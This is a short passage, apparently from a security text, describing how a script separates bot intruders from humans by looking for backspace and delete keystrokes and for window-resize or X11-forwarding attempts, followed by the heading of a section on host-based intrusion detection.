Regarding how it separates bots from humans, it says:
We, the humans, are clumsy. The script seeks for SUPR and BACKSPACE
characters in the executed commands.
The script also checks if the intruder tried to change the window
size or tried to forward X11 requests.
12.7 Host-Based Intrusion Detection
Game over man! Game over!